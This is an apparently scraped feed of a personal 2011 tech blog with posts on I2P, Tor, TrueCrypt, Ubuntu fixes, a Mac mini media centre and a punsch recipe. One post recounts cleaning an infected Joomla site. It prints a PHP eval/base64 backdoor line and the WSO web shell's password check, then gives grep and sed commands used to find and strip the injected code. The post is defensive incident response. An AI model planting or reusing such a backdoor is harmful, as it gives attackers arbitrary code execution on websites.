<a href="/images/stickers.jpg"><img src="/images/stickers.jpg" width="240px" alt="laptop stickers" style="display:block; margin-left: auto; margin-right: auto;" /></a><br />
The Anonymous-suit-guy I bought at <a href="https://stuckoff.3dcartstores.com/">stuckoff.com</a>. It is really nice quality but I had to cut of bits of his legs since I the laptop is 13&quot; and it seemed to be made to fit the 15&quot; models. <br />
The <a href="http://telecomix.org/">telecomix</a> sticker I got from <a href="http://sikevux.se/">Sikevux</a> (Thanks!). </p></p>Chrome and Firefox shows passwords in plaintext2011-05-03T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/05/03/chrome-shows-passwords-in-plain-text<h2>Chrome and Firefox shows passwords in plaintext</h2>
<p class="publish_date">03 May 2011</p>
<p>I just noticied that when if you access <b>Options&#8594;Personal&#8594;Password Manager</b> in Chrome or <b>Settings&#8594;Security&#8594;Stored Passwords</b> in Firefox your password are shown in plain text. Thus is it easy for anyone who has access to your computer to see all your stored passwords in plaintext and not just access the sites from your computer. <br />
You can protect yourself against this in Firefox by setting a Master Password, in <b>Settings&#8594;Security</b>, forcing anyone using your computer to type in a password to get access to the other passwords. I do not know of a way to do this in Chrome, but if you do please leave a comment. </p>Brygga punsch2011-04-28T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2011/04/28/brygga-punsch<h2>Brygga punsch</h2>
<p class="publish_date">28 Apr 2011</p>
<p>Inspirerad av <a href="http://www.youtube.com/watch?v=utxhIwzIPVU">Edward Bloms framträdande</a> bryggde jag nyss Punsch enligt följande recept:<br />
<br />
* 3,5 dl Arrak<br />
* 1dl starkt svart te<br />
* 1,5 dl brännvin<br />
* 2 dl strösocker <br />
* 1/2 dl citron<br />
* 3,5 dl kokande vatten<br />
<br />
Jag lade även till<br />
* 4 cl brandy/cognac<br />
* 1 tsk honung<br />
<a href="/images/flaskor.jpg"><img src="/images/studentnaring.jpg" width="300px" alt="Huvudingredienserna" style="display:block; margin-left: auto; margin-right: auto;" /></a><br />
Blanda först alla de kalla ingredienserna. När du har hällt på sockret så rör om tills det har löst sig. Häll därefter på det kokande vattnet, smaka av och tillsätt sedan efter tycke. <br />
<br />
Nu skall min punsch stå till sig och smakas av om några veckor och jag skall då återkomma med det slutliga omdömet men jag kan påpeka redan nu att jag fann Punschen att vara något för sur. Nästa gång jag försöker (skam den som ger sig) så skall jag minska mängden citron och eventuellt ha lite mer sötma i. Jag är även intresserad av att blanda i lite whisky för att förgylla smaken. <br />
<a href="/images/skal.jpg"><img src="/images/skal.jpg" width="140px" alt="Färdigblandat" style="display:block; margin-left: auto; margin-right: auto;" /></a><br />
Punschreceptet får en egen flattr-knapp:<br />
<a class="FlattrButton" style="display:none; display:block; margin-left: auto; margin-right: auto;" href="http://blog.kejsarmakten.se/all/personal/2011/04/28/brygga-punsch.html"></a><br />
<noscript><a href="http://flattr.com/thing/177227/Punschrecept" target="_blank"><br />
<img src="http://api.flattr.com/button/flattr-badge-large.png" style="display:block; margin-left: auto; margin-right: auto;" alt="Flattr this" title="Flattr this" border="0" /></a></noscript>
<p>Har du något punschrecept eller förslag på förbättringar så lämna gärna en kommentar, detta är ju trots allt mitt första försök.</p>
<p><strong>update</strong></p>
<p>Efter att ha kokat ett par omgångar punsch till kan jag starkt rekommendera att koka upp ett sockerlag istället för att blanda ut sockret direkt i drycken som ovan.<br />
<!-- <a href="/images/flaska.jpg"><img src="/images/flaska.jpg" /></a> --></p>
</p>Using I2P instance on a server locally on laptop2011-04-27T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/04/27/use-i2p-from-server<h2>Using I2P instance on a server locally on laptop</h2>
<p class="publish_date">27 Apr 2011</p>
<p>To avoid battery drainage, and such, I do not run <a href="http://i2p2.de/">I2P</a> locally on my laptops since I already run a rather high speed node on one of my servers. <br />
But of couse, like everyone else, I like to be able to visit my darknetz even on the move. So I have solved this by using <span class="caps">SSH</span> to make an encrypted tunnel to my server and binding port 4444 (the standard port) on localhost to 4444 on the server running my I2P node. It works like a charm. <br />
I put this in my .bash_profile (or .bashrc or whatever floats your boat).<br />
<br />
<pre class="terminal">function i2p(){<br /> ssh -NL 4444:localhost:4444 user@my_server_ip_or_address.com <br/>}</pre> <br />
As I have <a href="http://blog.kejsarmakten.se/all/software/2010/12/03/connecting-to-i2p.html">written about before</a> I use FoxyProxy to automatically choose when I need to use the I2P port and when I do not. <br />
It really works like a charm.</p>Send Page Up to Weechat in OS X terminal2011-04-22T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/04/22/page-up-to-weechat-in-os-x<h2>Send Page Up to Weechat in OS X terminal</h2>
<p class="publish_date">22 Apr 2011</p>
<p>To send Page Up to Weechat when you are using the OS X terminal (instead of page up triggering &#8220;scroll up&#8221; in the terminal window) press <br />
<pre class="terminal">[shift][ctrl] + [up]</pre> </p>TrueCrypt on OS X Snow Leopard2011-04-19T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/04/19/truecrypt-on-snow-leopard<h2>TrueCrypt on OS X Snow Leopard</h2>
<p class="publish_date">19 Feb 2011</p>
<p>It seems that there is a generalt notion out there that <b>Snow Leopard</b> breaks the support for <b>TrueCrypt</b> on <b>OS X</b>. <br />
It is true that you are unable to mount encrypted files after install. I got an error saying something like <i>macfuse file system not available</i>.<br />
There exists an easy fix for this though:<br />
The problem seems to be caused by a dependency,<i> MacFuse</i>, that does not work with the 64bit verison of OS X. I solved this by installing another binary of MacFuse that supports 64bit OS X.<br />
It can be found <a href="http://kuroc.at/blog/2011/03/macfuse-failed-to-load-fusefs-kext/">here</a>. If you do not trust the source it may be possible to install MacFuse<br />
through MacPorts with 64bit support, I have not confirmed this though. If you know more about this please drop a comment below.<br /> </p>Problem with authentication on APF on Ubuntu2011-04-15T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/04/15/AFP-login-error-on-ubuntu<h2>Problem with authentication on <span class="caps">APF</span> on Ubuntu</h2>
<p class="publish_date">15 Apr 2011</p>
<p>After setting up an <span class="caps">APF</span> share on my Ubuntu machine I was unable to authenticate correctly when I tried to connect to it with my OS X machine.<br />
The login window claimed that I used a incorrect username or password. <br />
I found the solution to it <a href="http://ubuntuforums.org/showthread.php?t=1676498">here on the ubuntu forum</a>:<br />
Simply edit the /etc/netatalk/afpd.conf config file and replace &#8216;uams_dhx.so&#8217; with &#8216;uams_dhx2.so&#8217; so the line looks like so: <br />
<pre class="terminal">- -transall -uamlist uams_randnum.so,uams_dhx2.so,uams_guest.so -nosavepassword -advertise_ssh</pre><br />
I set up the share while following <a href="http://www.kremalicious.com/2008/06/ubuntu-as-mac-file-server-and-time-machine-volume/">this great guide</a> so I expect that a lot of Ubuntu users following the guide will run into the same problem.<br />
Also: Since I used Ubuntu 10.10 Netatalk already seems to contain the necesary encryption and I could skip compiling it myself and I simply got it by grabbing it from the repository with <br />
<pre class="terminal">sudo apt-get install netatalk</pre> </p>Check your IP adress in the terminal2011-03-29T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2011/03/29/check-ip-in-terminal<h2>Check your IP adress in the terminal</h2>
<p class="publish_date">29 Mar 2011</p>
<p>Here is a simple way of finding out what <span class="caps">WAN</span> IP adress you have, according to an <a href="http://whatismyip.com">external source</a>, through the terminal. <br />
<pre class="terminal"> wget www.whatismyip.com/automation/n09230945.asp</pre><br />
A file called <b>n09230945.asp</b> will now have appeared in your current working directory containing your IP adress.<br /> <br />
<b>Update:</b><br/>
A find got a much cleaner solution as a tip in the comments. <br />
I put these commands in the .bash_profile file in my home directory. <br />
<pre class="terminal">function myip(){<br /> curl www.whatismyip.com/automation/n09230945.asp<br/> echo &quot;&quot;<br />}</pre><br />
(To reaload the .bash_profile file without rebooting write <i>source .bash_profile</i> and the settings will be reread).<br />
Now I am able to check the IP adress by writing <pre class="terminal">myip</pre> in the terminal and get the output directly in the terminal. <br /></p>The TOR bundle as torrent2011-03-28T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2011/03/28/tor-bundle-as-torrent<h2>The <span class="caps">TOR</span> bundle as torrent</h2>
<p class="publish_date">28 Mars 2011</p>
<p>Here is a copy of the <a href="https://www.torproject.org/projects/torbrowser.html.en"><span class="caps">TOR</span> bundle</a> as a torrent file. <br />
<ul><br />
<li><a href="/torrent/tor-browser-gnu-linux-i686-1.1.6-dev-en-US.tar.gz.275dbef3d55082be.torrent"><span class="caps">TOR</span> Bundle Linux i686 1.1.6</a> (<a href="/torrent/tor-browser-gnu-linux-i686-1.1.6-dev-en-US.tar.gz.asc">sig</a>)</li>
<li><a href="/torrent/tor-browser-gnu-linux-x86_64-1.1.6-dev-en-US.tar.gz.adbcaeeeff6d50d1.torrent"><span class="caps">TOR</span> Bundle Linux x86_64 1.1.6</a> (<a href="/torrent/tor-browser-gnu-linux-x86_64-1.1.6-dev-en-US.tar.gz.asc">sig</a>)</li>
</ul>
<p>Currently only the Linux versions, if someone wants me to host OS X or Windows versions please drop a comment below. <br /></p>
<p><b>What is it?</b> The <span class="caps">TOR</span> bundle is a package that contains <span class="caps">TOR</span> and Mozilla Firefox. You just download it and start the browser included and you will be connected to the <span class="caps">TOR</span> network. A good solution if you want to stay anonymous on a borrowed/public computer. <br />
If you are at home on your own computer I do not recommend that you use the <span class="caps">TOR</span> bundle but rather download the normal <span class="caps">TOR</span> installation. In that way you are able to use your Internet connection to contribute to the <span class="caps">TOR</span> network and help speeding it up and not just leeching on other peoples bandwidth. A simple way to become an everyday hero by helping repressed people around the world get Freedom of Speech. <br />
<b>Why?</b> I thought it a bit weird that torproject.org doesn&#8217;t offer the tor bundles as torrents. <br />
I&#8217;m just guessing here but it seem to me that their website would be the first thing blocked if someone were trying to censor Internet traffic. <br />
<br /></p>
<p><b>Please help me seed these torrents.</b> Also, if you notice that the bundle torrent hosted here is an old version please notify me and I will try to keep it updated.</p>
</p>Install Firefox 4 on Ubuntu2011-03-24T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2011/03/24/install-firefox-4<h2>Install Firefox 4 on Ubuntu</h2>
<p class="publish_date">24 Mar 2011</p>
<p>I&#8217;ve not been able to update the blog recently. I&#8217;ve been busy busy with exams and a trip to Finland to visit Åbo Nation. Here comes a minor update.</p>
<p>Currently if you do a normal update from the Ubuntu repository Mozilla Firefox does not get updated to the latest stable release (4). <br />
To avoid having to install another Firefox browsers you can add the Mozilla repository. <br />
Simply type <br />
<br />
<pre class="terminal">sudo add-apt-repository ppa:mozillateam/firefox-stable<br />
sudo apt-get update<br />
sudo apt-get upgrade</pre><br />
<br />
Voilá. Your Firefox browser is now updated to the latest stable release. </p>No password hashes loaded2011-02-15T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2011/02/15/no-password-hashes-loaded<h2>No password hashes loaded</h2>
<p class="publish_date">15 Feb 2011</p>
<p>If you get the error message &#8220;No password hashes loaded&#8221; when using <b>John the Ripper</b> on Ubuntu it is probably due to the fact that you are using the repositary version on Ubuntu 9.04 or a later version.<br />
This is because it lacks sha-512 ecnryption support. To fix this you have to compile it yourself. Read more about it <a href="http://pka.engr.ccny.cuny.edu/~jmao/node/26">here</a>.</p>SharePhoto for android - NO LONGER MAINTAINED2011-02-13T00:00:00+01:00http://blog.kejsarmakten.se/sharephoto<h2>SharePhoto for android &#8211; NO <span class="caps">LONGER</span> <span class="caps">MAINTAINED</span></h2>
<p class="publish_date">13 Feb 2011</p>
<p><br /></p>
<p><b> Please note that this project is no longer maintained and is made unavailable.</b><br />
<p>SharePhoto is a android application design to help people share pictures easily. <br />
The application uploads the picture to a webserver and presents the user with an easily shareable <span class="caps">URL</span>!<br />
The pictures are hosted for 24h and are removed after that.</p>
<p>The application is currently unavailable on Android Market but I hope that an official launch is imminent.</p><br />
<h3>How-to</h3><br />
<p>To share a picture open the gallery and press the Share-button and then select SharePhoto. Now you are done!<br />
The picture will be hosted on the server for 24h, the <span class="caps">URL</span> will be presented to you in the textbox in the application. There are two buttons, one allows you to open the <span class="caps">URL</span> in the browser and the other copies the <span class="caps">URL</span> to the clipboard so you can paste it later in an e-mail, on <span class="caps">IRC</span> or on a forum. Remember; Sharing is caring!</p><br />
<h3><span class="caps">FAQ</span></h3><br />
<p><b>When will the application be available for the public?</b> <br/>Before the week ends hopefully, I am working on a few last minute fixes and some graphics for the icons</p><br />
<p><b>How big pictures can I host?</b> <br />The limit hasn&#8217;t been set yet. It will depend on how though the load on the server will be and if I can afford more server power from my ads/flattr-revenue. </p><br />
<p><b>How many pictures can I host?</b> <br />The limit hasn&#8217;t been set yet. See the question above.</p><br />
<p><b>Help! I uploaded a picture by mistake, how do I remove it?</b><br />At the bottom of the page there is a link called &#8220;remove this image&#8221; press that. If you are using the same IP as when you uploaded the image then the picture will be removed automatically. If you are not you have to type in your Secret (found in Menu&#8594;Secret on the android app) in the box that will promt you for it.</p><br />
<p><b>I found a picture breaking the rules!</b><br />Report it to the email at the bottom of the pictre, don&#8217;t forget to include the <span class="caps">URL</span>!</p><br />
<p><b>I found a bug in the appilcation</b><br />Send me an email and explain the problem, or drop a comment below. I develop this app on my spare time but I will do my best to fix any problems discovered. </p><br />
<br />
<p>I develop this application on my spare time, and I pay the server fee out of my own pockets so any monetary support I could get is highly appriciated. Below is a link the the projects flattr!</p><br />
<br />
<p>Flattr the project:<br />
<a class="FlattrButton" style="display:none;"
href="http://blog.kejsarmakten.se/sharephoto.html"></a></p><br />
<p>Flattr the blog:</p></p>Display RSA fingerprint visually on Ubuntu2011-02-01T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2011/02/01/visual-rsa-fingerprint<h2>Display <span class="caps">RSA</span> fingerprint visually on Ubuntu</h2>
<p class="publish_date">01 Feb 2011</p>
<p>Today I got reminded of a great trick to overview the <span class="caps">RSA</span> fingerprint when you <span class="caps">SSH</span> to a remote machine. <br />
It makes it alot easier to get an overview of the fingerprint and see if somethings looks wrong/different.<br />
Just add <pre class="terminal">VisualHostKey yes</pre> to your ssh config file (on most linux dists it in /etc/ssh/ssh_config). The output will then like this:</p>
<pre class="terminal">The authenticity of host '192.168.1.100 (192.168.1.100)' can't be established.
RSA key fingerprint is 14:6f:09:d6:fd:26:33:f3:48:8c:05:5c:c0:6e:25:2f.
+--[ RSA 2048]----+
| |
| . |
| + . |
| . = |
| E + |
| o = * |
| = + * |
| . o ==o. |
| o .Bo |
+-----------------+
Are you sure you want to continue connecting (yes/no)? </pre>Saturday hack2011-01-31T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2011/01/31/hacknight<h2>Saturday hack</h2>
<p class="publish_date">31 Jan 2011</p>
<p>Yesterday was hacknight and I had a few friends over in my appartment. <br />
We also made it a key signing party so now you can find my <span class="caps">PGP</span> key <a href="/about.html">here</a> or on <a href="http://pgp.mit.edu">pgp.mit.edu</a>. If you want to communicate with me encrypted.</p>
<p>I mostly worked on a proof of concept <a href="http://cryptoanarchy.org/wiki/Blackthrow">Blackthrow box (svartkast)</a> which I will probably write more about in the future when it is done. We got most of the features working on it with both as a <span class="caps">TOR</span>-hidden service and accesable through I2P. The truecrypt disks are mounted by hand on the otherwise unencrypted system to make it more recilliant to power-outs and other reboots. More on this subject another day.</p>
<p>There where also some Android hacking going on and a arty java- program was written to play any binary file as a <span class="caps">MIDI</span> song&#8230; :D (source and the developers blog can be found <a href="http://www.implode.se/2011/01/30/d10-hacknight/">here</a>). </p>
<p><a href="http://en.wikipedia.org/wiki/Spider_trap">A crawlbot trap</a> was also developed (for bots who doesn&#8217;t follow robots.txt). I&#8217;m hoping to be able to publish the source code for it here soon! Stay tuned. </p>
<p><a href="/images/hack2.jpg"><img src="/images/hack2.jpg" width="300px" alt="Great minds think alike ;D" /></a><br />
<a href="/images/hack1.jpg"><img src="/images/hack1.jpg" width="300px" alt="/facepalm" /></a><br />
<a href="/images/hack3.jpg"><img src="/images/hack3.jpg" width="300px"/></a><br />
<p>All in all it was a fun night. I hope we will be able to host another hack night soon.</p></p>Blog available through I2P Darknet!2011-01-22T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2011/01/22/blog-available-through-i2p<h2>Blog available through I2P Darknet!</h2>
<p class="publish_date">14 Jul 2010</p>
<p>This site is now available through the i2p darknet on <a href="http://blog.kejsarmakten.i2p">this address</a>. <br />
If it is not working you can try the base32 address <br />
<pre class="terminal">http://l6jdiukagsjyojpdhufpsrap5csi6z5tbiedz6v7ze6ohldqzt5a.b32.i2p/</pre></p>
<p>But what is I2P? Visit <a href="http://i2p2.de">i2p2.de</a> to learn more about it. <br />
Short answer is that I2P is a tool for democracy and freedom of speech. <br />
Here is a guide I&#8217;ve written (in Swedish) on <a href="/all/software/2010/12/03/connecting-to-i2p.html">how to connect to i2p</a>.</p>
Updated Atom feeds for the blog2011-01-20T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2011/01/20/updated-atom-feed<h2>Updated Atom feeds for the blog</h2>
<p class="publish_date">20 Jan 2011<br />
<p><br />
Now there are three different Atom- feeds for this blog. <br />
One that has all the new blog posts <a href="http://blog.kejsarmakten.se/atom.xml">here</a>.<br />
One for those who are only interested in the software development part of the blog <a href="http://blog.kejsarmakten.se/atom_software.xml">here</a>.<br />
And one for those who are not interested in the software posts at all <a href="http://blog.kejsarmakten.se/atom_personal.xml">here</a>.<br /></p>
</p>
<p><br /></p>Mac mini as a HTPC2011-01-19T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2011/01/19/mac-mini-as-htpc<h2>Mac mini as a <span class="caps">HTPC</span></h2>
<p class="publish_date">19 Jan 2011</p>
<p>About a year ago I bought my first OS X machine, a <a href="http://support.apple.com/kb/SP577">mac mini (late 2009 model)</a>, to use as a <span class="caps">HTPC</span> in our living-room.<br />
Here are my thoughts on how it has worked out if you are planning on buying one yourself for the same purpose.</p>
<ul>
<li><b>Looks:</b> As you can see on the pictures below the Mac Mini is a stylish little piece of computer. It fits discreetly in the room, and <a href="http://www.apple.com/macmini/">the new model</a> is even thinner. The machine is also really quiet and it is hard to notice if it is on or off (atleast if you are not reading from a CD).</li>
<li><b>Connections:</b> For sound I use the 3,5 mm audio cable and the screen is plug-in in to the TV with an Mini Display-Port to DVI.</li>
<a href="http://en.wikipedia.org/wiki/File:Mac_Mini_Ports.jpg"><img src="http://upload.wikimedia.org/wikipedia/commons/8/83/Mac_Mini_Ports.jpg" width="650p" /></a>
<li><b>Energy-efficient:</b> Apple claims that it is the <i>"World's most energy-efficient desktop computer"</i>.</li>
<li><b>Software:</b> I use <a href="http://www.plexapp.com/">Plex</a> as a media solution. It looks great and it is a pleasant way to browse through my videos. Plex works with music as well but it is not exceptional, I usually find myself using iTunes or VLC instead to play music even if I am not satisfied with them either. If you have any tips for me please leave a comment. </li>
<li><b>Remote control:</b> The greatest feature on the Mac mini is the Apple Remote I bought with the computer. After a bit of tweaking I had it working great with Plex. I can start and browse all my movies without walking up to the TV. Unfortunately when it started to work with Plex it stopped working with all the other programs (like iTunes) which is a bummer. I haven't put much energy into fixing the problem and I guess there is a way around it (I found some apps for it but they where not free (as in beer) so I just never bothered). <br />
Another great feature with Plex it that it lets you watch compressed files so I do not have to unzip all my files manually and store them uncompressed.<br />
When I have to do other stuff on the Mac, like installations etc, I connect to it with openVNC from one of my Ubuntu computers and remote control it that way. Besides some trouble with key mapping it works great.</li>
<li><b>Performance:</b> I store my media on an Ubuntu Server with a Samba share. I have then mounted this share in Plex and stream all the media I watch/listen to. It works great, and I even run it over Wifi (Linksys wrt54gl router running Tomato). It plays 720p videos without much problems over the wifi but if I want to watch 1080p I have to transfer the file to the local Mac Mini hard-drive. I think that it is the wifi that is the bottle neck though.</li>
<li><b>DVD-player:</b>I do not watch much DVDs so I can't really say much about the DVD player. All i know is that is rather noicy, and I really miss BluRay support.</li>
<li><b>Price:</b> The Mac Mini cost more now then when I bought it. I think I payed about 6000 SEK for it (current price is 6995 SEK). It is and was a rather expensive computer. You could get something like this a lot cheaper and install some free Linux dist on it. But I thought it would be fun to try out working with OS X and get some experience with the OS and it has been a rather smooth ride so far.
<li><b>Summary:</b> Would I recommend it? Yeah sure, it is a great machine and it easy to use. It is a bit pricey though and you could easily achieve the same result with a small desktop computer running Linux and Xbox media center. As always it depends on how much time you want to spend on setting it up.</li>
</ul>
<br />
<a href="/images/macmini1.jpg"><img src="/images/macmini1.jpg" width="650p" /></a> <br />
<a href="/images/macmini1.jpg"><img src="/images/macmini2.jpg" width="650p" /></a> <br />Malware on Joomla page2011-01-14T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2011/01/14/malware-in-joomla<h2>Malware on Joomla page</h2>
<p class="publish_date">14 Jan 2011</p>
<p>I help running a Joomla website for a student organisation in Lund. We have had problems with someone getting access to our web server and adding code to our <span class="caps">PHP</span> files.<br /></p>
<p>The added code is mostly obfuscated with the command &#8216;base64_decode(&#8220;jsadj.. jibberish ..ajdsa&#8221;)&#8217;. You can read about an earlier encounter we had with this problem on my old blog <a href="http://development.kejsarmakten.se/?p=60">here</a>.<br /></p>
<p>It took us a long time to notice the attack since the only visible change they made to the website was to redirect google searches from our website to malware websites in Poland.<br />
The difference between the last time and this latest injection is that this time there where thousands of lines of code added to the website. <br />
I downloaded a copy of the website to my local Linux server (since we do not have <span class="caps">SSH</span> access to our web server) and searched for “base64_decode” with this command<br />
<pre class="terminal">
find . -type f -name "*.php" -exec grep -H "base64_decode" {} \; > potentially_infected_files.txt
</pre><br />
This search revealed that almost all php files on the website where infected. Then we began the cumbersome work to disinfect and remove all of the infected code (we had to be rather careful since Joomla also uses base64_decode in some places). <br />
Then I stumbled over a way more simple way to remove most of the attackers work; In a file in called /cache/z.php there where a base64_decode function which decoded a very long message (a couple of thousand <span class="caps">LOC</span>). It was somewhat hard to decode since they used several layers of obfuscation. They had encoded it with both base64, str_13 and then compressed it. With a little tinkering I managed to see the code though. <br /> It seemed to be some sort of a interface to control our website. But when I visited the /cache/z.php site directly through the browser all I could see was this: <br />
<br />
<a href="/images/malware_login.png"><img src="/images/malware_login.png" /></a><br />
<br />
So I set to work and removed the authentication sequence in the code and uploaded it to the file again. <br />
I removed line 36 <pre class="terminal">( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )</pre><br />
<br />
Now I had access to the attackers shell. Here is a picture of what it looked like:</p>
<p><a href="/images/malware_shell.jpg"><img src="/images/malware_shell.jpg" width="200px" height="200px" /></a></p>
<p>I could make out from comments in the code that the tool is called <span class="caps">WSO</span> Shell by oRb and can be downloaded <a href=”http://www.opensc.ws/web-development/12530-wso2-5-a.html”>here</a>. <br />
The best thing about finding the shell was the “self remove” button. So since I had the sited backed up I decided to try it out. And guess what, it worked. It removed almost all of the inserted code on the website! <br />
Even though it removed the majority of the bad code it did not remove all of it. They had to get into the website to install the shell in the first place right? <br />
A couple more rounds with the search commands helped me to find some more malware code. They had i.e. on several places left commands that looked like this<br />
<pre class="terminal">
eval base64_decode($_POST[“php”]);
</pre>
<br />
Which would allow them to execute any php code on the website they wanted. <br />
This command help <a href="https://kd35a.se">us</a> out a lot when we had to remove several versions of the same code in several files. <br />
<pre class="terminal">find . -type f -name "*.php" -exec sed -i -e 's/eval(base64_decode("ZXJyb.. the thing you want to remove ..NCiR1YT0kX1="));//g' {} \; </pre>
<br />
<br />
<br />
When we had removed all of the injected code we were able to find we made an security upgrade of Joomla, changed all passwords and checked the site for <span class="caps">XXS</span> (cross site scripting) vulnerabilities with a great Firefox add-on called <a href="https://addons.mozilla.org/en-US/firefox/addon/xss-me/"><span class="caps">XXS</span> ME</a> but could not find any. <br />
I hope that this post can aid someone who have similar problems.</p>
<p><b><span class="caps">UPDATE</span>: The entry point &#8211; 2011-05-03</b><br />
<p>Alright, once again the site was infected. Apparently the security flaw wasn&#8217;t fixed in the security patch we downloaded for the website. Me and <a href="https://kd35a.se">my friend</a> once again put our wise heads together to figure out how the attacker got in to the website. <br />
We began by searching through the apache logs looking for access to the file <i>post.php</i> which contained <i>eval base64_decode($_POST[“php”]);</i> mentioned earlier. <br />
After searching the logs we found someone had access the file.<br />
<pre class="terminal"> $ grep -n -e "POST /includes/post.php" access_combined.log
$ 447914:www.website.com 70.00.000.000 - - [25/Apr/2011:14:02:04 +0200] "POST /includes/post.php HTTP/1.1" 200 406 "-" "-"</pre>
<br />
When we found access to the file in the logs we then searched the logs for the IP address that had accessed the file.<br />
The result looked something like this<br />
<pre class="terminal"> $ grep -n -e "70.00.000.000" access_combined.log
$ 422787:www.website.com 70.000.00.00 - - [19/Apr/2011:12:27:39 +0200] "POST /components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php HTTP/1.1" 200 5 "none" "" </pre>
<br />
This gave us a rough list of what the attacker had been up to. And we could by looking at the earliest entries single out the entry point to our website. <br />
It was an old plugin we had lying around that hadn&#8217;t got an security update since 2009. In our case it was an old version of <a href="http://extensions.joomla.org/extensions/photos-&-images/photo-flash-gallery/4883/details">Ozio Gallery</a>. <br />
We removed the plugin, uninstalled the attacker shell (as described above) and then removed all the base64 obfuscated redirects in the same manner as last time.<br />
This time I even found a little greeting from the cracker crew in my robot.txt file.<br />
<b>Good luck in your attempts to clean out your website.</b></p>
<p></p>
<p></p>
<p></p>Arduino hand controller controlling a pygame2011-01-09T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2011/01/09/ardunio-moves<h2>Arduino hand controller controlling a pygame</h2>
<p class="publish_date">09 Jan 2011</p>
<p>Blog post of minor interest perhaps but I am eager to show of the progress I&#8217;ve done on my <a href="/all/software/2010/11/09/arduino-sings.html">Ardunio hand controller</a>.<br />
<br />
I&#8217;ve written a simple game in the python library Pygame which I am able to control with my hand controller. <br />
It is no where near done, right now I only use the buttons and not the joystick. It would be fun to write real joystick firmware to it so I could use it with any game that has joystick support. We shall see what the future holds. <br />
I&#8217;m planning to release all of the source code here on the website as soon as I&#8217;ve tidied it up a little. </p>
<p><br />
<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/87cm-7qqpK0?hl=en&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/87cm-7qqpK0?hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>AF Bostäders nya lägenhenheter som RSS2011-01-04T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2011/01/04/AFB-rss<h2>AF Bostäders nya lägenhenheter som <span class="caps">RSS</span></h2>
<p class="publish_date">04 Jan 2011<br />
<br />
<a href="http://blog.kejsarmakten.se/afbrss/" target="_blank"><img src="/images/afblogo.png" style="float:left;" /></a><br />
<br /><br /> <br /> <p>Efter att min flickvän har klagat över att hon var tvungen att gå in på <a href="http://www.afb.se/" target="_blank">www.afb.se</a> varje dag för att se om det kommit upp några nya bostäder så beslöt jag mig för att skriva ett litet pythonscript som parsar AF Bostäders hemsida efter nya lägenheter och presenterar dem som ett <span class="caps">RSS</span> flöde som man kan följa med t.ex Google Reader.</p> <br />
<p>Det är ett snabbt hack men jag tänkte att det kanske finns någon annan som också skulle kunna vara intresserad av att uttnyttja <span class="caps">RSS</span>-flödet så jag länkar till det <a href="http://blog.kejsarmakten.se/afbrss/" target="_blank">här</a>.</p><br />
<p>För tillfället så är <span class="caps">UTF</span>-8 encodingen inte är helt korrekt så åäö blir ibland fel tecken. Utöver det tänkte jag lägga till så att man kan ställa in i sitt flöde om man endast vill ha med lägenheter i en viss storlek eller från ett visst område. Uppdaterar här, samt skriver på <a href="https://twitter.com/#!/kejsarmakten" target="_blank">twitter</a> när det är fixat. <br /> Har du någon nytta av flödet så flattr;a mig gärna!</p><br />
<p>Om ni märker att feeden slutar fungera eller att något saknas så lägg gärna en kommentar nedanför eller så skicka mig ett mail och beskriv vad det är som saknas!</p><br />
<p>Här en Flattr-knapp till <span class="caps">RSS</span> feeden, tryck gärna och hjälp mig betala serverkostnaderna :* <br /><br />
<a class="FlattrButton" style="display:none;" href="http://blog.kejsarmakten.se/all/personal/2011/01/04/AFB-rss.html"></a><br />
<noscript><a href="http://flattr.com/thing/277503/AF-Bostaders-nya-lagenheter-som-RSS" target="_blank"><br />
<img src="http://api.flattr.com/button/flattr-badge-large.png" alt="Flattr this" title="Flattr this" border="0" /></a></noscript></p><br />
<p><b>Update:</b> På grund av ökad popularitet för <span class="caps">RSS</span> feeden har jag skrivit om det lite så att det nu mera är ett cron- job som körs en gång om dagen (kl 0100, ungefär när <span class="caps">AFB</span> updaterar sina nya bostäder) istället för att scriptet körs var gång någon besöker hemsidan. Det minskar trafiken till www.afb.se kraftigt så jag slipper överbelasta dem. Ni som använder feeden bör inte märka någon skillnad då afb endast verkar updatera hemsidan en gång per dygn ändå.</p></p>
<p><b>English summary:</b> I&#8217;ve made a small python hack to parse www.afb.se for new apparments from <span class="caps">AFB</span> in Lund, Sweden, and present it as an <span class="caps">RSS</span>-feed. <a href="http://blog.kejsarmakten.se/afbrss/" target="_blank">Here is a link to it</a>.</p>Common sense2010-12-15T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2010/12/15/common-sense<h2>Common sense</h2>
<p class="publish_date">15 Dec 2010</p>
<p>When talking to people about computers I am often surprised at how many who forget/don&#8217;t care to/don&#8217;t know how to do a few basic things every computer user should do. So I thought I&#8217;d summarize a few tips below.</p>
<ol>
<li><a href="#backup">Backup your data regularly.</a></li>
</ol>
<ol>
<li><a href="#encrypt">Encrypt your hard drives.</a></li>
</ol>
<ol>
<li><a href="#https">Use encrypted connections when you are on a network</h>.</li>
</ol>
<h2><a name="#backup">Backup your data regularly!</a></h2>
<p>You <span class="caps">WILL</span> lose your files unless you backup your files on an external media.</p>
<p>Think of all the family pictures, videos and all the memories that will be lost if your hard drive broke?</p>
<p>If you do any kind of work on your computer this gives you even more of a reason to back it up.</p>
